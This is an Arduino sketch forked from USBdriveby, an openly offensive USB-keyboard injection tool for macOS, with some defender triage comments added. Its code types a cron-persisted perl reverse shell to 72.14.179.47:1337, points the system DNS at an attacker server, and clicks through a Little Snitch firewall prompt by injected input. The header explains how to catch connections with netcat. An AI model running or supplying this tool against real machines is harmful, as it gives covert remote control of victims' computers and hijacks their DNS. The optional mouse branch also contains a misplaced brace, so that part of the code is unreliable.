forked from samyk/usbdriveby
usbdriveby_osx.ino
// USBdriveby, by samy kamkar
// This is the OS X version. Windows version is in usbdriveby_windows.ino
//
// https://samy.pl/usbdriveby
// in order to listen for the backdoor installed, simply run netcat:
// nc -l 1337
// this listens on port 1337 for a connection from an infected machine
// and once connected, you can begin send commands to the machine!
// Address of the author's remote DNS server, which answers normal DNS requests
// but spoofs the requests it is configured to spoof
// (server code: http://samy.pl/usbdriveby).
// setup() types this value into the host's DNS server setting, so a resolver
// entry with this address on a machine is an indicator that this sketch ran.
#define EVIL_SERVER "66.228.55.205"
// Base delay in milliseconds; the pauses in the keyboard helpers and in loop()
// are multiples or fractions of this value.
int ds = 500;
// On-board LED pin: 11 when CORE_TEENSY is defined, otherwise 13.
#if defined(CORE_TEENSY)
#define LED_PIN 11
#else
#define LED_PIN 13
#endif
// Choose if you want to have the Teensy submit Little Snitch with the mouse, or the keyboard.
// Uncomment USE_MOUSE to use the mouse instead of the keyboard to submit Little Snitch.
// #define USE_MOUSE
// Arduino entry point, run once after the board starts. The board presents
// itself to the host as a USB keyboard and mouse, and everything below is
// blind, timing-based input injection into whatever session is unlocked on
// the host; no step checks that the previous one succeeded.
//
// Host-side changes this routine makes (triage checklist for defenders):
//   - appends an entry to the logged-in user's crontab that, every 5 minutes,
//     runs a perl IO::Socket one-liner connecting to 72.14.179.47:1337 and
//     executing each line it receives
//   - sets the DNS server reached through the System Preferences search to
//     EVIL_SERVER
//   - via pwnLittleSnitch(), answers a Little Snitch connection prompt if one
//     appears
// When an unexpected HID device has been attached to an unlocked Mac, review
// `crontab -l` for each user and the configured DNS servers. The injection
// needs an unlocked session, so screen locking and restricting which USB
// accessories may attach are the relevant mitigations.
void setup()
{
  // give us a little time to connect up
  delay(1000);
  // allow controlling LED
  pinMode(LED_PIN, OUTPUT);
  // turn the LED on while we're pwning
  digitalWrite(LED_PIN, HIGH);
  // open spotlight (or alfred/qs), then System Preferences<return>
  openapp("System Preferences");
  // now open Terminal
  openapp("Terminal");
  // open new terminal window
  cmd(KEY_N);
  // if the little snitch firewall is
  // installed, let's permanently add our
  // remote host so they never get asked to
  // allow the connection since little
  // snitch allows the keyboard to control it
  //
  // if there is no little snitch, we perform
  // keystrokes that, in Terminal, will
  // cause no issues.
  pwnLittleSnitch();
  // add our reverse tunneling backdoor to
  // cron to run every 5 minutes
  // (persistence: the existing crontab is re-emitted with one extra line, so
  // the new entry sits alongside the user's existing jobs in `crontab -l`)
  typeln("(crontab -l ; echo \"*/5 * * * * perl -MIO::Socket -e'\\$c=new IO::Socket::INET(\\\"72.14.179.47:1337\\\");print\\$c \\`\\$_\\`while<\\$c>'\") | crontab -");
  // Now move the System Preferences window where we want it, top left corner
  // (a fixed window position is what makes the relative mouse moves below land
  // on the intended buttons)
  typeln("osascript -e 'tell application \"System Events\" to set bounds of window \"System Preferences\" of application \"System Preferences\" to {0, 0, 700, 700}'");
  // tell application "System Events" to set
  // bounds of window "System Preferences"
  // of application "System Preferences"
  // to {0, 0, 700, 700}
  // CMD+Tab back into System Preferences
  cmd(KEY_TAB);
  // CMD+F to go into System Preferences search box
  cmd(KEY_F);
  // Type in DNS Servers<return>
  typeln("DNS Servers");
  // may take a while
  delay(3000);
  // Key down in DNS servers, enter to change, and type in IP
  k(KEY_DOWN);
  typeln("");
  typeln(EVIL_SERVER);
#if !defined(CORE_TEENSY)
  // Start moving the mouse -- this function only needed for arduinos
  Mouse.begin();
#endif
  // Move to top left of screen
  // (1000 relative moves of -10,-10 so the pointer ends in the corner
  // regardless of where it started)
  for (int i = 0; i < 1000; i++)
  {
    Mouse.move(-10, -10);
    delay(1);
  }
  // If we have hot corners enabled, move out and move back in
  for (int i = 0; i < 100; i++)
  {
    Mouse.move(1, 1);
    delay(5);
  }
  delay(500);
  for (int i = 0; i < 100; i++)
  {
    Mouse.move(-1, -1);
    delay(5);
  }
  delay(500);
  // move to "OK" button
  Mouse.move(100, 100);
  Mouse.move(100, 100);
  Mouse.move(100, 100);
  Mouse.move(100, 100);
  Mouse.move(100, 100);
  Mouse.move(70, 10);
  // Move to 580,540 (ok button)
  // (the move inside this loop is commented out, so as written the loop only
  // waits 54*5 iterations of 10 ms)
  for (int i = 0; i < 54*5; i++)
  {
    // Mouse.move(1, 1);
    delay(10);
  }
  delay(1000);
  // Click OK in DNS window
  Mouse.click();
  delay(500);
  // Click Apply in Network window
  Mouse.move(0, 20);
  delay(1000);
  Mouse.click();
  // Quit System Preferences/Network
  cmd(KEY_Q);
  // CMD+Tab back into Terminal
  // cmd(KEY_TAB);
  delay(1000);
  // then close the terminal window
  typeln("");
  typeln("exit");
  // exit terminal (if nothing is running)
  cmd(KEY_Q);
  // in case another window is running in terminal,
  // don't quit terminal in popup window by hitting ESC
  k(KEY_ESC);
  // we're done!
}
// Send `chars` to the host as keystrokes, then press Return.
// A pause of ds ms follows the text and a pause of 4*ds ms follows the
// Return; the extra delays keep the typing visible while it happens.
void typeln(String chars)
{
  const int pause = ds;

  Keyboard.print(chars);
  delay(pause);

  Keyboard.println("");
  delay(pause * 4);
}
// Launch an OS X application by name: Cmd+Space opens Spotlight (or
// Alfred/Quicksilver when bound to the same shortcut), then the name is typed
// and submitted with Return via typeln().
void openapp(String app)
{
  const int launcher_key = KEY_SPACE;

  cmd(launcher_key);
  typeln(app);
}
// Tap one key with no modifier: send a report with the key pressed, wait
// ds/2 ms, send a report with the key released, wait ds/2 ms.
void k(int key)
{
  const int half_delay = ds / 2;

  // key down
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(half_delay);

  // key up
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(half_delay);
}
// Tap `key` while the modifier `mod` is held.
// The modifier goes out in its own report before the key is added, both are
// held for ds ms, then both are cleared in a single report followed by
// another ds ms pause.
void mod(int mod, int key)
{
  const int hold = ds;

  // modifier down first
  Keyboard.set_modifier(mod);
  Keyboard.send_now();

  // then the key, with the modifier still set
  Keyboard.set_key1(key);
  Keyboard.send_now();
  delay(hold);

  // release everything
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(hold);
}
// Tap `key` with Control held (thin wrapper over mod()).
void ctrl(int key)
{
  const int modifier = MODIFIERKEY_CTRL;
  mod(modifier, key);
}
// Tap `key` with the GUI (Command on OS X) modifier held (thin wrapper over mod()).
void cmd(int key)
{
  const int modifier = MODIFIERKEY_GUI;
  mod(modifier, key);
}
// Tap `key` with Shift held (thin wrapper over mod()).
void shift(int key)
{
  const int modifier = MODIFIERKEY_SHIFT;
  mod(modifier, key);
}
// Arduino main loop, entered after setup() returns: blink the LED with a
// ds/2 ms on-time and ds/2 ms off-time as the visible "finished" signal.
void loop()
{
  const int half_period = ds / 2;

  digitalWrite(LED_PIN, HIGH);
  delay(half_period);

  digitalWrite(LED_PIN, LOW);
  delay(half_period);
}
// evade little snitch if it's installed, but don't fumble if not installed
//
// Triggers an outbound connection to 72.14.179.47:1337 from Terminal so that
// the Little Snitch firewall, if installed, raises its connection prompt, then
// answers that prompt with injected input to allow the host permanently.
// When no prompt appears, the same keystrokes land in Terminal, where they
// turn the current line into a comment and cancel it.
//
// Defender notes: the technique depends on the firewall prompt accepting
// synthetic keyboard/mouse input from a newly attached HID device. When
// triaging a suspected run, review the firewall's rule list for a permanent
// allow rule towards the address above (presumably attributed to perl, since
// that is the process making the connection; confirm in the rule list).
void pwnLittleSnitch()
{
  // connect to our reverse tunneled backdoor to
  // get little snitch to open if it's installed
  typeln("perl -MIO::Socket -e'$c=new IO::Socket::INET(\"72.14.179.47:1337\")'");
  // move our keyboard using the arrow keys to allow this host permanently ;)
  k(KEY_UP);
  k(KEY_LEFT);
  // go to beginning of line if there's no little snitch (Ctrl+A)
  // since we would still be in terminal
  ctrl(KEY_A); // go to beginning of line (Ctrl+a)
  shift(KEY_3); // add a # (shift+3)
  ctrl(KEY_C); // ^C to exit line (Ctrl+c)
  // Here is where we submit Little Snitch with either a keyboard or mouse, based on what you selected above.
#ifdef USE_MOUSE
  // Move to top left of screen
  for (int i = 0; i < 1000; i++)
  {
    Mouse.move(-10, -10);
    delay(1);
  }
  // If we have hot corners enabled, move out and move back in
  for (int i = 0; i < 100; i++)
  {
    Mouse.move(1, 1);
    delay(5);
  }
  delay(500);
  // move to Little Snitch Allow button
  Mouse.move(100, 100);
  delay(20);
  Mouse.move(100, 100);
  delay(20);
  Mouse.move(120, -70);
  delay(1000);
  Mouse.click(); // Click click!
  delay(ds);
}
#else
  cmd(KEY_ENTER); // submit little snitch with keyboard.
#endif
  delay(ds);
}